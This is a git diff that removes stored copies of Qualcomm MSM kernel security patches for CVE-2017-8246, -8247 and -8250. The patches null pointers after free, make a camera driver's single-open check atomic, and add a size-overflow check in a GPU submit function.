---- a/sound/soc/msm/qdsp6v2/msm-pcm-q6-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-pcm-q6-v2.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -755,6 +755,8 @@ static int msm_pcm_playback_close(struct snd_pcm_substream *substream)
- msm_pcm_routing_dereg_phy_stream(soc_prtd->dai_link->be_id,
- SNDRV_PCM_STREAM_PLAYBACK);
- kfree(prtd);
-+ runtime->private_data = NULL;
-+
- return 0;
- }
-
-@@ -860,6 +862,7 @@ static int msm_pcm_capture_close(struct snd_pcm_substream *substream)
- msm_pcm_routing_dereg_phy_stream(soc_prtd->dai_link->be_id,
- SNDRV_PCM_STREAM_CAPTURE);
- kfree(prtd);
-+ runtime->private_data = NULL;
-
- return 0;
- }
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8246/3.4/0001.patch b/Patches/Linux_CVEs/CVE-2017-8246/3.4/0001.patch
deleted file mode 100644
index 6f911bbb..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8246/3.4/0001.patch
+++ /dev/null
@@ -1,90 +0,0 @@
-From ac8b4b8f6976c6f63704c2f1e3dc464bfa6a5256 Mon Sep 17 00:00:00 2001
-From: Xiaojun Sang
-Date: Fri, 24 Feb 2017 16:13:20 +0800
-Subject: [PATCH] BACKPORT: ASoC: msm: qdsp6v2: set pointer to NULL after free.
-
-Pointer after kfree is not sanitized.
-Set pointer to NULL.
-
-CRs-Fixed: 2008031
-Change-Id: Ia59a57fcd142a6ed18d168992b8da4019314afa4
-Signed-off-by: Xiaojun Sang
-Signed-off-by: Bikshapathi Kothapeta
----
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c
-index 3284380..f4a9a4d 100644
---- a/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c
-@@ -391,6 +391,7 @@
- SNDRV_PCM_STREAM_PLAYBACK);
- q6asm_audio_client_free(prtd->audio_client);
- kfree(prtd);
-+ compr->prtd = NULL;
- return 0;
- }
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-multi-ch-pcm-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-multi-ch-pcm-q6-v2.c
-index 98401d9..f93029c 100644
---- a/sound/soc/msm/qdsp6v2/msm-multi-ch-pcm-q6-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-multi-ch-pcm-q6-v2.c
-@@ -503,6 +503,7 @@
- multi_ch_pcm_audio.prtd = NULL;
- q6asm_audio_client_free(prtd->audio_client);
- kfree(prtd);
-+ runtime->private_data = NULL;
- return 0;
- }
-
-@@ -595,6 +596,7 @@
- SNDRV_PCM_STREAM_CAPTURE);
- q6asm_audio_client_free(prtd->audio_client);
- kfree(prtd);
-+ runtime->private_data = NULL;
-
- return 0;
- }
-diff --git a/sound/soc/msm/qdsp6v2/msm-pcm-afe-v2.c b/sound/soc/msm/qdsp6v2/msm-pcm-afe-v2.c
-index b6ecaa6..68a6b3d 100644
---- a/sound/soc/msm/qdsp6v2/msm-pcm-afe-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-pcm-afe-v2.c
-@@ -396,6 +396,7 @@
- mutex_unlock(&prtd->lock);
- prtd->prepared--;
- kfree(prtd);
-+ runtime->private_data = NULL;
- return 0;
- }
- static int msm_afe_prepare(struct snd_pcm_substream *substream)
-diff --git a/sound/soc/msm/qdsp6v2/msm-pcm-lpa-v2.c b/sound/soc/msm/qdsp6v2/msm-pcm-lpa-v2.c
-index a6c8f16..9c575a5 100644
---- a/sound/soc/msm/qdsp6v2/msm-pcm-lpa-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-pcm-lpa-v2.c
-@@ -391,6 +391,7 @@
- pr_debug("%s\n", __func__);
- q6asm_audio_client_free(prtd->audio_client);
- kfree(prtd);
-+ runtime->private_data = NULL;
-
- return 0;
- }
-diff --git a/sound/soc/msm/qdsp6v2/msm-pcm-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-pcm-q6-v2.c
-index 57ccea1..f5846ca 100644
---- a/sound/soc/msm/qdsp6v2/msm-pcm-q6-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-pcm-q6-v2.c
-@@ -446,6 +446,7 @@
- SNDRV_PCM_STREAM_PLAYBACK);
- q6asm_audio_client_free(prtd->audio_client);
- kfree(prtd);
-+ runtime->private_data = NULL;
- return 0;
- }
-
-@@ -538,6 +539,7 @@
- SNDRV_PCM_STREAM_CAPTURE);
- q6asm_audio_client_free(prtd->audio_client);
- kfree(prtd);
-+ runtime->private_data = NULL;
-
- return 0;
- }
diff --git a/Patches/Linux_CVEs/CVE-2017-8246/3.4/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-8246/3.4/0001.patch.base64
deleted file mode 100644
index 75310d3e..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8246/3.4/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@ -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 \ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-8246/3.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-8246/3.4/0002.patch
deleted file mode 100644
index 112437e7..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8246/3.4/0002.patch
+++ /dev/null
@@ -1,162 +0,0 @@
-From 5b3fcb8c073ea1762744eeb74d2e8301a8728d7b Mon Sep 17 00:00:00 2001
-From: Xiaojun Sang
-Date: Fri, 24 Feb 2017 16:13:20 +0800
-Subject: [PATCH] BACKPORT: ASoC: msm: qdsp6: set pointer to NULL after free.
-
-Pointer after kfree is not sanitized.
-Set pointer to NULL.
-
-CRs-Fixed: 2008031
-Change-Id: I765a59a2059ba7a0fc16f70a1a8b92f57297a907
-Signed-off-by: Xiaojun Sang
-Signed-off-by: Bikshapathi Kothapeta
----
-
-diff --git a/sound/soc/msm/msm-lowlatency-pcm-q6.c b/sound/soc/msm/msm-lowlatency-pcm-q6.c
-index ad7ae1f..0f323c4 100644
---- a/sound/soc/msm/msm-lowlatency-pcm-q6.c
-+++ b/sound/soc/msm/msm-lowlatency-pcm-q6.c
-@@ -504,6 +504,7 @@
- SNDRV_PCM_STREAM_PLAYBACK);
- q6asm_audio_client_free(prtd->audio_client);
- kfree(prtd);
-+ runtime->private_data = NULL;
- return 0;
- }
-
-@@ -596,6 +597,7 @@
- SNDRV_PCM_STREAM_CAPTURE);
- q6asm_audio_client_free(prtd->audio_client);
- kfree(prtd);
-+ runtime->private_data = NULL;
-
- return 0;
- }
-diff --git a/sound/soc/msm/msm-multi-ch-pcm-q6.c b/sound/soc/msm/msm-multi-ch-pcm-q6.c
-index 999683e..59072ec 100644
---- a/sound/soc/msm/msm-multi-ch-pcm-q6.c
-+++ b/sound/soc/msm/msm-multi-ch-pcm-q6.c
-@@ -576,6 +576,7 @@
- multi_ch_pcm_audio.prtd = NULL;
- q6asm_audio_client_free(prtd->audio_client);
- kfree(prtd);
-+ runtime->private_data = NULL;
- return 0;
- }
-
-@@ -668,6 +669,7 @@
- SNDRV_PCM_STREAM_CAPTURE);
- q6asm_audio_client_free(prtd->audio_client);
- kfree(prtd);
-+ runtime->private_data = NULL;
-
- return 0;
- }
-diff --git a/sound/soc/msm/msm-pcm-afe.c b/sound/soc/msm/msm-pcm-afe.c
-index 66043d1..a93d58b 100644
---- a/sound/soc/msm/msm-pcm-afe.c
-+++ b/sound/soc/msm/msm-pcm-afe.c
-@@ -326,6 +326,7 @@
- pr_debug("%s: Could not allocate memory\n", __func__);
- mutex_unlock(&prtd->lock);
- kfree(prtd);
-+ runtime->private_data = NULL;
- return -ENOMEM;
- }
- hrtimer_init(&prtd->hrt, CLOCK_MONOTONIC, HRTIMER_MODE_REL);
-@@ -409,6 +410,7 @@
- mutex_unlock(&prtd->lock);
- prtd->prepared--;
- kfree(prtd);
-+ runtime->private_data = NULL;
- return 0;
- }
- static int msm_afe_prepare(struct snd_pcm_substream *substream)
-diff --git a/sound/soc/msm/msm-pcm-q6.c b/sound/soc/msm/msm-pcm-q6.c
-index 16e1415..da696d0 100644
---- a/sound/soc/msm/msm-pcm-q6.c
-+++ b/sound/soc/msm/msm-pcm-q6.c
-@@ -509,6 +509,7 @@
- SNDRV_PCM_STREAM_PLAYBACK);
- q6asm_audio_client_free(prtd->audio_client);
- kfree(prtd);
-+ runtime->private_data = NULL;
- return 0;
- }
-
-@@ -604,6 +605,7 @@
- msm_pcm_routing_dereg_phy_stream(soc_prtd->dai_link->be_id,
- SNDRV_PCM_STREAM_CAPTURE);
- kfree(prtd);
-+ runtime->private_data = NULL;
-
- return 0;
- }
-diff --git a/sound/soc/msm/msm7k-pcm.c b/sound/soc/msm/msm7k-pcm.c
-index a9193a2..50983a0 100644
---- a/sound/soc/msm/msm7k-pcm.c
-+++ b/sound/soc/msm/msm7k-pcm.c
-@@ -393,6 +393,7 @@
- msm_adsp_put(prtd->audrec);
- msm_adsp_put(prtd->audpre);
- kfree(prtd);
-+ runtime->private_data = NULL;
-
- return 0;
- }
-@@ -449,6 +450,7 @@
-
- out:
- kfree(prtd);
-+ runtime->private_data = NULL;
- return ret;
- }
-
-@@ -492,6 +494,7 @@
- alsa_audio_disable(prtd);
- audmgr_close(&prtd->audmgr);
- kfree(prtd);
-+ runtime->private_data = NULL;
-
- return 0;
- }
-diff --git a/sound/soc/msm/msm7kv2-pcm.c b/sound/soc/msm/msm7kv2-pcm.c
-index 2b7a438..252e1f0 100644
---- a/sound/soc/msm/msm7kv2-pcm.c
-+++ b/sound/soc/msm/msm7kv2-pcm.c
-@@ -520,6 +520,7 @@
- alsa_audio_disable(prtd);
- auddev_unregister_evt_listner(AUDDEV_CLNT_DEC, prtd->session_id);
- kfree(prtd);
-+ runtime->private_data = NULL;
-
- return 0;
- }
-@@ -574,6 +575,7 @@
- audpreproc_aenc_free(prtd->session_id);
- msm_adsp_put(prtd->audrec);
- kfree(prtd);
-+ runtime->private_data = NULL;
- return 0;
- }
-
-diff --git a/sound/soc/msm/msm8x60-pcm.c b/sound/soc/msm/msm8x60-pcm.c
-index 7993435..bfbea5c 100644
---- a/sound/soc/msm/msm8x60-pcm.c
-+++ b/sound/soc/msm/msm8x60-pcm.c
-@@ -534,6 +534,7 @@
- msm_clear_session_id(prtd->session_id);
- q6asm_audio_client_free(prtd->audio_client);
- kfree(prtd);
-+ runtime->private_data = NULL;
-
- return 0;
- }
-@@ -627,6 +628,7 @@
- msm_clear_session_id(prtd->session_id);
- q6asm_audio_client_free(prtd->audio_client);
- kfree(prtd);
-+ runtime->private_data = NULL;
-
- return 0;
- }
diff --git a/Patches/Linux_CVEs/CVE-2017-8246/3.4/0002.patch.base64 b/Patches/Linux_CVEs/CVE-2017-8246/3.4/0002.patch.base64
deleted file mode 100644
index 961efb82..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8246/3.4/0002.patch.base64
+++ /dev/null
@@ -1 +0,0 @@ -RnJvbSA1YjNmY2I4YzA3M2VhMTc2Mjc0NGVlYjc0ZDJlODMwMWE4NzI4ZDdiIE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBYaWFvanVuIFNhbmcgPHhzYW5nQGNvZGVhdXJvcmEub3JnPgpEYXRlOiBGcmksIDI0IEZlYiAyMDE3IDE2OjEzOjIwICswODAwClN1YmplY3Q6IFtQQVRDSF0gQkFDS1BPUlQ6IEFTb0M6IG1zbTogcWRzcDY6IHNldCBwb2ludGVyIHRvIE5VTEwgYWZ0ZXIgZnJlZS4KClBvaW50ZXIgYWZ0ZXIga2ZyZWUgaXMgbm90IHNhbml0aXplZC4KU2V0IHBvaW50ZXIgdG8gTlVMTC4KCkNScy1GaXhlZDogMjAwODAzMQpDaGFuZ2UtSWQ6IEk3NjVhNTlhMjA1OWJhN2EwZmMxNmY3MGExYThiOTJmNTcyOTdhOTA3ClNpZ25lZC1vZmYtYnk6IFhpYW9qdW4gU2FuZyA8eHNhbmdAY29kZWF1cm9yYS5vcmc+ClNpZ25lZC1vZmYtYnk6IEJpa3NoYXBhdGhpIEtvdGhhcGV0YSA8YmtvdGhhQGNvZGVhdXJvcmEub3JnPgotLS0KCmRpZmYgLS1naXQgYS9zb3VuZC9zb2MvbXNtL21zbS1sb3dsYXRlbmN5LXBjbS1xNi5jIGIvc291bmQvc29jL21zbS9tc20tbG93bGF0ZW5jeS1wY20tcTYuYwppbmRleCBhZDdhZTFmLi4wZjMyM2M0IDEwMDY0NAotLS0gYS9zb3VuZC9zb2MvbXNtL21zbS1sb3dsYXRlbmN5LXBjbS1xNi5jCisrKyBiL3NvdW5kL3NvYy9tc20vbXNtLWxvd2xhdGVuY3ktcGNtLXE2LmMKQEAgLTUwNCw2ICs1MDQsNyBAQAogCQkJU05EUlZfUENNX1NUUkVBTV9QTEFZQkFDSyk7CiAJcTZhc21fYXVkaW9fY2xpZW50X2ZyZWUocHJ0ZC0+YXVkaW9fY2xpZW50KTsKIAlrZnJlZShwcnRkKTsKKwlydW50aW1lLT5wcml2YXRlX2RhdGEgPSBOVUxMOwogCXJldHVybiAwOwogfQogCkBAIC01OTYsNiArNTk3LDcgQEAKIAkJCVNORFJWX1BDTV9TVFJFQU1fQ0FQVFVSRSk7CiAJcTZhc21fYXVkaW9fY2xpZW50X2ZyZWUocHJ0ZC0+YXVkaW9fY2xpZW50KTsKIAlrZnJlZShwcnRkKTsKKwlydW50aW1lLT5wcml2YXRlX2RhdGEgPSBOVUxMOwogCiAJcmV0dXJuIDA7CiB9CmRpZmYgLS1naXQgYS9zb3VuZC9zb2MvbXNtL21zbS1tdWx0aS1jaC1wY20tcTYuYyBiL3NvdW5kL3NvYy9tc20vbXNtLW11bHRpLWNoLXBjbS1xNi5jCmluZGV4IDk5OTY4M2UuLjU5MDcyZWMgMTAwNjQ0Ci0tLSBhL3NvdW5kL3NvYy9tc20vbXNtLW11bHRpLWNoLXBjbS1xNi5jCisrKyBiL3NvdW5kL3NvYy9tc20vbXNtLW11bHRpLWNoLXBjbS1xNi5jCkBAIC01NzYsNiArNTc2LDcgQEAKIAltdWx0aV9jaF9wY21fYXVkaW8ucHJ0ZCA9IE5VTEw7CiAJcTZhc21fYXVkaW9fY2xpZW50X2ZyZWUocHJ0ZC0+YXVkaW9fY2xpZW50KTsKIAlrZnJlZShwcnRkKTsKKwlydW50aW1lLT5wcml2YXRlX2RhdGEgPSBOVUxMOwogCXJldHVybiAwOwogfQogCkBAIC02NjgsNiArNjY5LDcgQEAKIAlTTkRSVl9QQ01fU1RSRUFNX0NBUFRVUkUpOwogCXE2YXNtX2F1ZGlvX2NsaWVudF9mcmVlKHBydGQtPmF1ZGlvX2NsaWVudCk7CiAJa2ZyZWUocHJ0ZCk7C
isJcnVudGltZS0+cHJpdmF0ZV9kYXRhID0gTlVMTDsKIAogCXJldHVybiAwOwogfQpkaWZmIC0tZ2l0IGEvc291bmQvc29jL21zbS9tc20tcGNtLWFmZS5jIGIvc291bmQvc29jL21zbS9tc20tcGNtLWFmZS5jCmluZGV4IDY2MDQzZDEuLmE5M2Q1OGIgMTAwNjQ0Ci0tLSBhL3NvdW5kL3NvYy9tc20vbXNtLXBjbS1hZmUuYworKysgYi9zb3VuZC9zb2MvbXNtL21zbS1wY20tYWZlLmMKQEAgLTMyNiw2ICszMjYsNyBAQAogCQlwcl9kZWJ1ZygiJXM6IENvdWxkIG5vdCBhbGxvY2F0ZSBtZW1vcnlcbiIsIF9fZnVuY19fKTsKIAkJbXV0ZXhfdW5sb2NrKCZwcnRkLT5sb2NrKTsKIAkJa2ZyZWUocHJ0ZCk7CisJCXJ1bnRpbWUtPnByaXZhdGVfZGF0YSA9IE5VTEw7CiAJCXJldHVybiAtRU5PTUVNOwogCX0KIAlocnRpbWVyX2luaXQoJnBydGQtPmhydCwgQ0xPQ0tfTU9OT1RPTklDLCBIUlRJTUVSX01PREVfUkVMKTsKQEAgLTQwOSw2ICs0MTAsNyBAQAogCW11dGV4X3VubG9jaygmcHJ0ZC0+bG9jayk7CiAJcHJ0ZC0+cHJlcGFyZWQtLTsKIAlrZnJlZShwcnRkKTsKKwlydW50aW1lLT5wcml2YXRlX2RhdGEgPSBOVUxMOwogCXJldHVybiAwOwogfQogc3RhdGljIGludCBtc21fYWZlX3ByZXBhcmUoc3RydWN0IHNuZF9wY21fc3Vic3RyZWFtICpzdWJzdHJlYW0pCmRpZmYgLS1naXQgYS9zb3VuZC9zb2MvbXNtL21zbS1wY20tcTYuYyBiL3NvdW5kL3NvYy9tc20vbXNtLXBjbS1xNi5jCmluZGV4IDE2ZTE0MTUuLmRhNjk2ZDAgMTAwNjQ0Ci0tLSBhL3NvdW5kL3NvYy9tc20vbXNtLXBjbS1xNi5jCisrKyBiL3NvdW5kL3NvYy9tc20vbXNtLXBjbS1xNi5jCkBAIC01MDksNiArNTA5LDcgQEAKIAkJCVNORFJWX1BDTV9TVFJFQU1fUExBWUJBQ0spOwogCXE2YXNtX2F1ZGlvX2NsaWVudF9mcmVlKHBydGQtPmF1ZGlvX2NsaWVudCk7CiAJa2ZyZWUocHJ0ZCk7CisJcnVudGltZS0+cHJpdmF0ZV9kYXRhID0gTlVMTDsKIAlyZXR1cm4gMDsKIH0KIApAQCAtNjA0LDYgKzYwNSw3IEBACiAJbXNtX3BjbV9yb3V0aW5nX2RlcmVnX3BoeV9zdHJlYW0oc29jX3BydGQtPmRhaV9saW5rLT5iZV9pZCwKIAkJU05EUlZfUENNX1NUUkVBTV9DQVBUVVJFKTsKIAlrZnJlZShwcnRkKTsKKwlydW50aW1lLT5wcml2YXRlX2RhdGEgPSBOVUxMOwogCiAJcmV0dXJuIDA7CiB9CmRpZmYgLS1naXQgYS9zb3VuZC9zb2MvbXNtL21zbTdrLXBjbS5jIGIvc291bmQvc29jL21zbS9tc203ay1wY20uYwppbmRleCBhOTE5M2EyLi41MDk4M2EwIDEwMDY0NAotLS0gYS9zb3VuZC9zb2MvbXNtL21zbTdrLXBjbS5jCisrKyBiL3NvdW5kL3NvYy9tc20vbXNtN2stcGNtLmMKQEAgLTM5Myw2ICszOTMsNyBAQAogCW1zbV9hZHNwX3B1dChwcnRkLT5hdWRyZWMpOwogCW1zbV9hZHNwX3B1dChwcnRkLT5hdWRwcmUpOwogCWtmcmVlKHBydGQpOworCXJ1bnRpbWUtPnByaXZhdGVfZGF0YSA9IE5VTEw7CiAKIAlyZXR1cm4gMDsKIH0KQEAgLTQ0OSw2ICs0NTAsNyBAQAogCiAgb3V0OgogCWtmc
mVlKHBydGQpOworCXJ1bnRpbWUtPnByaXZhdGVfZGF0YSA9IE5VTEw7CiAJcmV0dXJuIHJldDsKIH0KIApAQCAtNDkyLDYgKzQ5NCw3IEBACiAJYWxzYV9hdWRpb19kaXNhYmxlKHBydGQpOwogCWF1ZG1ncl9jbG9zZSgmcHJ0ZC0+YXVkbWdyKTsKIAlrZnJlZShwcnRkKTsKKwlydW50aW1lLT5wcml2YXRlX2RhdGEgPSBOVUxMOwogCiAJcmV0dXJuIDA7CiB9CmRpZmYgLS1naXQgYS9zb3VuZC9zb2MvbXNtL21zbTdrdjItcGNtLmMgYi9zb3VuZC9zb2MvbXNtL21zbTdrdjItcGNtLmMKaW5kZXggMmI3YTQzOC4uMjUyZTFmMCAxMDA2NDQKLS0tIGEvc291bmQvc29jL21zbS9tc203a3YyLXBjbS5jCisrKyBiL3NvdW5kL3NvYy9tc20vbXNtN2t2Mi1wY20uYwpAQCAtNTIwLDYgKzUyMCw3IEBACiAJYWxzYV9hdWRpb19kaXNhYmxlKHBydGQpOwogCWF1ZGRldl91bnJlZ2lzdGVyX2V2dF9saXN0bmVyKEFVRERFVl9DTE5UX0RFQywgcHJ0ZC0+c2Vzc2lvbl9pZCk7CiAJa2ZyZWUocHJ0ZCk7CisJcnVudGltZS0+cHJpdmF0ZV9kYXRhID0gTlVMTDsKIAogCXJldHVybiAwOwogfQpAQCAtNTc0LDYgKzU3NSw3IEBACiAJYXVkcHJlcHJvY19hZW5jX2ZyZWUocHJ0ZC0+c2Vzc2lvbl9pZCk7CiAJbXNtX2Fkc3BfcHV0KHBydGQtPmF1ZHJlYyk7CiAJa2ZyZWUocHJ0ZCk7CisJcnVudGltZS0+cHJpdmF0ZV9kYXRhID0gTlVMTDsKIAlyZXR1cm4gMDsKIH0KIApkaWZmIC0tZ2l0IGEvc291bmQvc29jL21zbS9tc204eDYwLXBjbS5jIGIvc291bmQvc29jL21zbS9tc204eDYwLXBjbS5jCmluZGV4IDc5OTM0MzUuLmJmYmVhNWMgMTAwNjQ0Ci0tLSBhL3NvdW5kL3NvYy9tc20vbXNtOHg2MC1wY20uYworKysgYi9zb3VuZC9zb2MvbXNtL21zbTh4NjAtcGNtLmMKQEAgLTUzNCw2ICs1MzQsNyBAQAogCW1zbV9jbGVhcl9zZXNzaW9uX2lkKHBydGQtPnNlc3Npb25faWQpOwogCXE2YXNtX2F1ZGlvX2NsaWVudF9mcmVlKHBydGQtPmF1ZGlvX2NsaWVudCk7CiAJa2ZyZWUocHJ0ZCk7CisJcnVudGltZS0+cHJpdmF0ZV9kYXRhID0gTlVMTDsKIAogCXJldHVybiAwOwogfQpAQCAtNjI3LDYgKzYyOCw3IEBACiAJbXNtX2NsZWFyX3Nlc3Npb25faWQocHJ0ZC0+c2Vzc2lvbl9pZCk7CiAJcTZhc21fYXVkaW9fY2xpZW50X2ZyZWUocHJ0ZC0+YXVkaW9fY2xpZW50KTsKIAlrZnJlZShwcnRkKTsKKwlydW50aW1lLT5wcml2YXRlX2RhdGEgPSBOVUxMOwogCiAJcmV0dXJuIDA7CiB9Cg== \ No newline at end of file diff --git a/Patches/Linux_CVEs/CVE-2017-8246/4.4/0005.patch b/Patches/Linux_CVEs/CVE-2017-8246/4.4/0005.patch deleted file mode 100644 index 2db95a61..00000000 --- a/Patches/Linux_CVEs/CVE-2017-8246/4.4/0005.patch +++ /dev/null 
@@ -1,93 +0,0 @@
-From 9734b72ae21eca557540c3c42d356dd131a20004 Mon Sep 17 00:00:00 2001
-From: Xiaojun Sang
-Date: Fri, 24 Feb 2017 16:13:20 +0800
-Subject: ASoC: msm: qdsp6v2: set pointer to NULL after free
-
-Unsanitized pointer after kfree leads to potential risk.
-Set pointer to NULL.
-
-CRs-Fixed: 2008031
-Change-Id: Ia59a57fcd142a6ed18d168992b8da4019314afa4
-Signed-off-by: Xiaojun Sang
----
- sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c | 2 ++
- sound/soc/msm/qdsp6v2/msm-pcm-afe-v2.c | 3 ++-
- sound/soc/msm/qdsp6v2/msm-pcm-q6-noirq.c | 2 ++
- sound/soc/msm/qdsp6v2/msm-pcm-q6-v2.c | 3 +++
- 4 files changed, 9 insertions(+), 1 deletion(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c
-index 7f032dc..9a40dad 100644
---- a/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c
-@@ -1586,6 +1586,7 @@ static int msm_compr_playback_free(struct snd_compr_stream *cstream)
- kfree(pdata->dec_params[soc_prtd->dai_link->be_id]);
- pdata->dec_params[soc_prtd->dai_link->be_id] = NULL;
- kfree(prtd);
-+ runtime->private_data = NULL;
-
- return 0;
- }
-@@ -1645,6 +1646,7 @@ static int msm_compr_capture_free(struct snd_compr_stream *cstream)
- q6asm_audio_client_free(ac);
-
- kfree(prtd);
-+ runtime->private_data = NULL;
-
- return 0;
- }
-diff --git a/sound/soc/msm/qdsp6v2/msm-pcm-afe-v2.c b/sound/soc/msm/qdsp6v2/msm-pcm-afe-v2.c
-index d65108e..b1a1ea5 100644
---- a/sound/soc/msm/qdsp6v2/msm-pcm-afe-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-pcm-afe-v2.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -684,6 +684,7 @@ done:
- mutex_unlock(&prtd->lock);
- prtd->prepared--;
- kfree(prtd);
-+ runtime->private_data = NULL;
- return 0;
- }
- static int msm_afe_prepare(struct snd_pcm_substream *substream)
-diff --git a/sound/soc/msm/qdsp6v2/msm-pcm-q6-noirq.c b/sound/soc/msm/qdsp6v2/msm-pcm-q6-noirq.c
-index 33c5b64..9c24712 100644
---- a/sound/soc/msm/qdsp6v2/msm-pcm-q6-noirq.c
-+++ b/sound/soc/msm/qdsp6v2/msm-pcm-q6-noirq.c
-@@ -570,6 +570,8 @@ static int msm_pcm_close(struct snd_pcm_substream *substream)
- SNDRV_PCM_STREAM_PLAYBACK :
- SNDRV_PCM_STREAM_CAPTURE);
- kfree(prtd);
-+ runtime->private_data = NULL;
-+
- return 0;
- }
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-pcm-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-pcm-q6-v2.c
-index e14f410..7928c37 100644
---- a/sound/soc/msm/qdsp6v2/msm-pcm-q6-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-pcm-q6-v2.c
-@@ -804,6 +804,8 @@ static int msm_pcm_playback_close(struct snd_pcm_substream *substream)
- msm_pcm_routing_dereg_phy_stream(soc_prtd->dai_link->be_id,
- SNDRV_PCM_STREAM_PLAYBACK);
- kfree(prtd);
-+ runtime->private_data = NULL;
-+
- return 0;
- }
-
-@@ -909,6 +911,7 @@ static int msm_pcm_capture_close(struct snd_pcm_substream *substream)
- msm_pcm_routing_dereg_phy_stream(soc_prtd->dai_link->be_id,
- SNDRV_PCM_STREAM_CAPTURE);
- kfree(prtd);
-+ runtime->private_data = NULL;
-
- return 0;
- }
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8247/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-8247/ANY/0001.patch
deleted file mode 100644
index b7337300..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8247/ANY/0001.patch
+++ /dev/null
@@ -1,35 +0,0 @@
-From 84f8c42e5d848b1d04f49d253f98296e8c2280b9 Mon Sep 17 00:00:00 2001
-From: Trishansh Bhardwaj
-Date: Fri, 7 Apr 2017 11:16:29 +0530
-Subject: msm: camera: Allow driver file to be opend only once.
-
-Use proper synchronization to ensure driver file is opened
-only once.
-
-CRs-Fixed: 2023513
-Change-Id: I71e55e2d487fe561d3f596590b3e8102c5e921b5
-Signed-off-by: Trishansh Bhardwaj
----
- drivers/media/platform/msm/camera_v2/msm.c | 4 +---
- 1 file changed, 1 insertion(+), 3 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/msm.c b/drivers/media/platform/msm/camera_v2/msm.c
-index c2b42a8..d8bdef5 100644
---- a/drivers/media/platform/msm/camera_v2/msm.c
-+++ b/drivers/media/platform/msm/camera_v2/msm.c
-@@ -1012,11 +1012,9 @@ static int msm_open(struct file *filep)
- BUG_ON(!pvdev);
-
- /* !!! only ONE open is allowed !!! */
-- if (atomic_read(&pvdev->opened))
-+ if (atomic_cmpxchg(&pvdev->opened, 0, 1))
- return -EBUSY;
-
-- atomic_set(&pvdev->opened, 1);
--
- spin_lock_irqsave(&msm_pid_lock, flags);
- msm_pid = get_pid(task_pid(current));
- spin_unlock_irqrestore(&msm_pid_lock, flags);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8250/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-8250/ANY/0001.patch
deleted file mode 100644
index 93ed6a1d..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8250/ANY/0001.patch
+++ /dev/null
@@ -1,40 +0,0 @@
-From 9be5b16de622c2426408425e3df29e945cd21d37 Mon Sep 17 00:00:00 2001
-From: Kasin Li
-Date: Wed, 22 Feb 2017 18:25:36 +0800
-Subject: drm/msm: Fix potential buffer overflow issue
-
-In function submit_create, if nr_cmds or nr_bos is assigned with
-negative value, the allocated buffer may be small than intended.
-Using this buffer will lead to buffer overflow issue.
-
-Change-Id: I0b61cccffd836e2dd3c859446470af4b6451b9ed
-Signed-off-by: Kasin Li
----
- drivers/gpu/drm/msm/msm_gem_submit.c | 7 +++++--
- 1 file changed, 5 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/gpu/drm/msm/msm_gem_submit.c b/drivers/gpu/drm/msm/msm_gem_submit.c
-index adbb0cb..fa9b641 100644
---- a/drivers/gpu/drm/msm/msm_gem_submit.c
-+++ b/drivers/gpu/drm/msm/msm_gem_submit.c
-@@ -34,12 +34,15 @@ static inline void __user *to_user_ptr(u64 address)
- }
-
- static struct msm_gem_submit *submit_create(struct drm_device *dev,
-- struct msm_gpu *gpu, int nr_cmds, int nr_bos)
-+ struct msm_gpu *gpu, uint32_t nr_cmds, uint32_t nr_bos)
- {
- struct msm_gem_submit *submit;
-- int sz = sizeof(*submit) + (nr_bos * sizeof(submit->bos[0])) +
-+ uint64_t sz = sizeof(*submit) + (nr_bos * sizeof(submit->bos[0])) +
- (nr_cmds * sizeof(submit->cmd[0]));
-
-+ if (sz > SIZE_MAX)
-+ return NULL;
-+
- submit = kmalloc(sz, GFP_TEMPORARY | __GFP_NOWARN | __GFP_NORETRY);
- if (submit) {
- submit->dev = dev;
---
-cgit v1.1
-
